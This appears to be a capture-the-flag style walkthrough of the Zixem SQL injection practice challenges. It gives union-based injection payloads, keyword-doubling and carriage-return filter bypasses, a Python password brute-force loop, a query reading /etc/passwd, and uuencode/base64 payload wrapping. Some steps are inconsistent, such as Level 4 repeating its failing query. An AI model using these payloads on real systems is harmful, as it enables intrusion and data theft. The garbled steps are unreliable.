Comprehensive Zixem SQLi Challenges Solutions — 2019

It’s been years since i have ever worked onto performing manual SQL Injections and i must say that i have almost forgot how to do that. In order to get my hands back onto performing manual SQL-Injection i thought of working onto different challenges. As i have heard about Zixem Challenges being one of the great so in this writeup we are going to solve all Zixem Challenges while learning together. Hope you will enjoy the write up.

Let’s move onto the website and navigate onto Zixem SQLi Challenges. We are presented with the list of challenges. Obviously we will be solving the one by one.

http://www.zixem.altervista.org/SQLi/

All we need is to focus on the rules. So!

Rules!
Use only UNION BASED!
Your mission is to select only the version & user and to take screenshot as proof.
Have Fun (:
Now we are ready to hunt down the challenges one by one.

NOTE: I will prefer using HackBar add-on for Firefox and Chrome.

1. Level 1 (Super Easy)

As the name suggests this level is easy.

We know that we are looking for SQL Error but where is the error. To get the error and to confirm we need to break the query or to make the query invalid.

Before we do so let’s assume how this page is working. What is going to be the query before we try to exploit it. Having an idea will help us in exploiting SQLi in a better way.

SELECT * FROM levels WHERE ID=1
The website is selecting all the levels first and then checking the ID provided. The ID is 1 so we are being greeted by the level 1.

Firstly the query can be broken by simple putting single quote (‘) after the integer or making it invalid by adding (AND 1=2).

1 = 1 is true but 1 = 2 is false. Thus it breaks the query.

SELECT * FROM levels WHERE ID=1'
SELECT * FROM levels WHERE ID=1 AND 1=2

Let’s run it on the website.

We are being greeted by the SQLi Error mentioning that the syntax is invalid. What’s next. All we need is to find the column and it can be done is different ways.

  1. Order By
  2. Union Select
  3. Group By

Let’s start with the first one i.e Order By. All we need is to keep on checking whether the columns are valid or invalid. It is always 1 less than the total number of columns.

SELECT * FROM levels WHERE ID=1 ORDER BY 1 — +-

On ‘order by 1’. The page remains the same. Let’s try ‘order by 4’.

The “ — +-” at the end of the query is a comment. Thus we are making it sure that there is nothing after this comment or if there is something comment it so it doesn’t become a part of the SQL Query.
SELECT * FROM levels WHERE ID=1 ORDER BY 4— +-

On ‘order by 4’ we got an error stating “unknown column 4”. What does it means. Do quick maths: 4–1 = 3. Before moving onto using UNION statement. Let’s try group by statement.

When we used the order by statement we were guessing columns at our end. When we will be using Group By statement we can provide a number of columns and it will output how many columns are there in the database.

SELECT * FROM levels WHERE ID=1 GROUP BY 1,2,3,4,5,6,7,8,9,10 — +-

I have provided 10 columns to the group by statement to check from and guess what we have the same error as we did by using Order By statement. Thus ‘Group By’ is time saving technique.

Let’s move onto exploitation now.

We knew there are 3 columns. So now all we need is to UNITE them together so that we can extract the data.

SELECT * FROM levels WHERE ID=1 UNION ALL SELECT 1,2,3 — +-

We can extract the data via number 1 and number 2.

If you look at the URL i have added ‘AND 1=2’ after ‘id=1’. This makes the query invalid. This can be done in another way i.e adding a ‘-’ after ‘id=-1’ (like this). Both are same. Choice is yours.

Now all we need is to select the user and the version. Its simple!

User: user()
Version: version()

Let’s put these two instead of 1 and 2 and we get.

SELECT * FROM levels WHERE ID=1 AND 1=2 UNION ALL SELECT user(), version(), 3 — +-

We are done with the first challenge! You guys are going great.


2. Level 2 (Easy)

Level 2 says that it is easy. Let’s move onto exploiting it as well!

Let’s assume the query first.

SELECT * FROM profiles WHERE SHOWPROFILE=4

Let’s try exploiting this the same way we did in Level 1. On providing the quotation mark we are greeted with the error.

SELECT * FROM profiles WHERE SHOWPROFILE=4'

Now it’s time to look for columns. Let’s use the same numbers as we used in LEVEL 1 by directly jumping onto UNION statement.

SELECT * FROM profiles WHERE SHOWPROFILE=4 AND 4=5 UNION ALL SELECT 1,2,3 — +-

No error. What can be wrong here? What if it is taking a string as an input rather than integer? Let’s break down the query again ;)

SELECT * FROM profiles WHERE SHOWPROFILE=4 AND 4=5' UNION ALL SELECT 1,2,3 — +-

We have broken the query but still the error is there. The error says that we need to fix the quotation mark as we have opened it although we have forgotten to close that :P

SELECT * FROM profiles WHERE SHOWPROFILE=4 AND 4=5' UNION ALL SELECT 1,2,3' — +-

Ahhh! we got another error. What does it says? Different number of columns? What does that means. It is simple that there are more than 3 column. Let’s ad another one i.e 4 :P

SELECT * FROM profiles WHERE SHOWPROFILE=4 AND 4=5' UNION ALL SELECT 1,2,3 ,4'— +-

We got it. Now add we need is to output the user and the version :))

SELECT * FROM profiles WHERE SHOWPROFILE=4 AND 4=5' UNION ALL SELECT 1,user(),version() ,4' — +-

We are done with the second challenge :))


3. Level 3 (Medium)

This challenge is of medium difficulty.

Assuming the query first.

SELECT * FROM items WHERE ITEM=3

Let’s break it down.

SELECT * FROM items WHERE ITEM=3'

We are represented with the error. Let’s try using the UNION SELECT query we made for the challenge 2.

SELECT * FROM items WHERE ITEM=3 AND 3=4' UNION ALL SELECT 1,2,3,4' — +-

The error tells us that the ‘on’ of the UNION is being filtered out. So we need to bypass this process. We can add ON two times so that if it get’s filtered once still second ON will be combined with the statement and the query will work fine.

SELECT * FROM items WHERE ITEM=3 AND 3=4' UNIONON ALL SELECT 1,user(),version(),4' — +-

We are done with challenge 3 as well :))


4. Level 4 (Normal)

Level 4 is of normal difficulty.

Assuming the query.

SELECT * FROM ebooks WHERE EBOOKID=7

Let’s break it down :))

SELECT * FROM ebooks WHERE EBOOKID=7'

We are presented with the error. Let’s try using the UNION query we made for challenge 3.

SELECT * FROM ebooks WHERE EBOOKID=7 AND 7=8' UNION ALL SELECT 1,2,3,4' — +-

We have got an error which tells that there are different number of columns. Let’s try adding 5 :))

Let’s move onto checking the user and the version of the database.

SELECT * FROM ebooks WHERE EBOOKID=7 AND 7=8' UNION ALL SELECT 1,2,3,4' — +-

We are done with the challenge :))


5. Level 5 (Get your “bot-writing” skills)

This level is a bruteforce challenge.

I have learned to always check the source code when it comes to web application/login panels.

Well, the source code has it. The password is hashed and the hash is MD5. We have also been provided with the link to crack the hash. Let’s try opening it.

That makes some sense though. Let’s try it :))

The password has been cracked. Let’s log into the account.

So we have been trolled. The message says that the password is only numbers. But why is there a GOOD PASS?

So we have been trolled again. Let’ try to find a way out now.

Python can help us write a small script which can do everything. Let’s assume that i am also not good at python and i am googling everything. I know that there is a library named Requests in python that all what we need.

Read the below articles if you don’t know about python :))

Below is our required script.
— — — — — — — — — — — —
import requests
for i in range (1300, 10000):
 req = requests.get(“http://www.zixem.altervista.org/SQLi/login_do.php?pass=" + str(i))
 if “Wrong pass” in req.text:
 print(“Wrong Pass : %d\n” %i)
 else:
 print(“Pass Found : %d\n” %i)
 break

The password is 1337 :))

That’s all for this challenge. We have successfully written the script and have completed the challenge.


6. Level 6 (Experienced : Blind SQL Challenge)

This challenge as named is for the experienced people.

Read the rules before you proceed :)) It’s all about guessing now :))

Let’s read the task. Our task is to find the details of the teacher whose id or serial number is 11.

Assuming the query :))

SELECT * FROM teachers WHERE SERIAL=10 AND 10=11 UNION ALL SELECT 1,2,3,4 — +-

Now let’s look onto the two IMG links to check what they want to say about this challenge.

So the images are giving us an idea about the data. Let’s try building our query.

We know that there is an ID/Serial No, teacher, teacherage/age/teacher_age, price so let’s try finding it.

10 AND 10=11 UNION ALL SELECT id,teacher,teacher_age,price FROM teachers — +-

Working fine but we have missed something i.e the ID of the teacher. So let’s add the following query.

WHERE id=11 — +-

We did it finally. This was a great learning process :)) Hope you are enjoying so far.


7. Level 7 (Medium)

So we are back onto a medium challenge.

Yes! we are cool :P Let’s assume and then break the query :))

SELECT * FROM levels WHERE ID=1
SELECT * FROM levels WHERE ID=1'

The page shows nothing on breaking the query whether we try any of the following

SELECT * FROM levels WHERE ID=1'
SELECT * FROM levels WHERE ID=1/
SELECT * FROM levels WHERE ID=1 AND 1=2
SELECT * FROM levels WHERE ID=1 AND 1=2'

There is something going on behind the scenes. Let’s try looking onto the source code. As nothing is happening on the front.

Default Page Source Code

Value is being changed to error while in the default case it was set to OK. So things are going behind the scenes. Let’s try UNION statement from LEVEL 1 here.

SELECT * FROM levels WHERE ID=1 AND 1=2 UNION ALL SELECT 1,2,3 — +-
1st one shows and error and 2nd ones shows no error.

Let’s try grabbing the user and version from the database.

SELECT * FROM levels WHERE ID=1 AND 1=2 UNION ALL SELECT 1,user(),3 — +-
SELECT * FROM levels WHERE ID=1 AND 1=2 UNION ALL SELECT 1,version(),3 — +-

The column 2 is vulnerable and can only be exploited.

We are done with this challenge as well :))


8. Level 8 (Hard)

Well this level is hard now.

Let’s assume the query and break it.

SELECT * FROM levels WHERE ID=1
SELECT * FROM levels WHERE ID=1'

Let’s try changing the query again

SELECT * FROM levels WHERE ID=1 AND 1=2 — +-

It says that it is a hacking attempt. It’s means that something is being filtered out and something has been enabled in order to prevent SQL Injection attempt.

I have literally spent some time on this challenge in order to learn the maximum of it. The issue is with the white-spaces. No white-spaces are allowed. So we have to make a query in such a way that it does not have any white-space.

I remembered what google does to white-spaces. Do you?

Google adds + instead of space.

Still no luck. We need to find anything else. What about NULL byte ‘%00’

Seems like we need to study more about URL Encoding. Here are the resources which i followed.

The Carriage Return worked fine for this challenge.

The Query Becomes

SELECT * FROM levels WHERE ID=1%0dAND%0d1=2 — +- (Invalid Query)

I had to remove the comment section of the query i.e anything after + or i can remove the whole comment like

SELECT * FROM levels WHERE ID=1%0dAND%0d1=2 —
SELECT * FROM levels WHERE ID=1%0dAND%0d1=2

Both are valid queries.

Now it’s time to for the UNION statement to play it’s role.

1%0DAND%0D1=2%0DUNION%0DALL%0DSELECT%0D1,2,3 —

The UNION AND SELECT statements are not being accepted. We will require them to be bypassed. Let’s try to double them as below.

UNUNIONON
SELSELECTCT

On trying this. We can clearly see that UNION becomes UNUNIONON and SELSELECTCT becomes SELCT. It means that UNION is not being filtered out but SELECT is.

1%0DAND%0D1=2%0DUNION%0DALL%0DSELECSELECTT%0D1,2,3 —

Now it’s all to extract the user and version :))

Finally we did it. We have completed the challenge. I hope this was something new for you all to learn :))


9. Level 9 (Medium)

After a hardcore exploitation we are back onto a medium one.

In this challenge we have the mission to display the “passwd” file. We know it’s location though.

Let’s go ahead. I am not writing any queries anymore. I hope that you have an idea so far :))

Now it’s time to find the columns.

Let’s break it :))

So we have 2 columns. Let’s list them down :)

The error is gone. Now all we need is to list the ‘/etc/passwd’ file. Let’s add with quotation instead of 1 in the URL and boom.

We have successfully completed the challenge. This was easy though!


10. Level 10 (Pro)

Well this level is for PRO’s :P

Our mission is to only get version and to display our name.

Let’s go ahead. THE URL SEEMS TO BE CHANGED THOUGH!

AHHHHH! base64 encoding. Well this is simple too. I remembered exploiting these types of URL’s in past. All we need is to decode the encoded data, then add our payload and then decode it back to base64 and submit. Well it’s a long procedure but we have to do it in order to complete all Zixem SQLi Challenges :))

On decoding the encoded part. We are provided to something i haven’t seen before in my life. What now? Simply GOOGLE!

After some brainstorming and searching i came to know about this type of encoding known as Uuencode. All we need is to find a particular decoder for that.

So (!,0```) corresponds to 1. Now we know the procedure.

  1. We need to write our query.
  2. Encode it into Uuencode
  3. Encode it into Base64
  4. Submit the query.

Here is the Uuencoder

https://www.textencode.com/uuencode

Encoded into Uuencode.

Encoded into base64 and now what?

We are being greeted by number 2! finally some relief?

Let’s finish it all.

Final query of Uuencode

Encoding and Running it :))

Here we go. Finally we are done with all of the Zixem SQLi Challenges.

Big shout-out to this guys for making such an amazing list of challenges.

I hope that you have enjoyed this walk-through.

Note: I have been writing this Walk-Through after performing and trying to complete challenges first. Spent my whole day on these challenges and also writing this walk-through. I hope the readers reading this will be learning more as well :)

Don’t forget to appreciate and comment if you like the Walk-Through. That’s how i will be knowing how much have you liked this walk-through.

Thank for reading!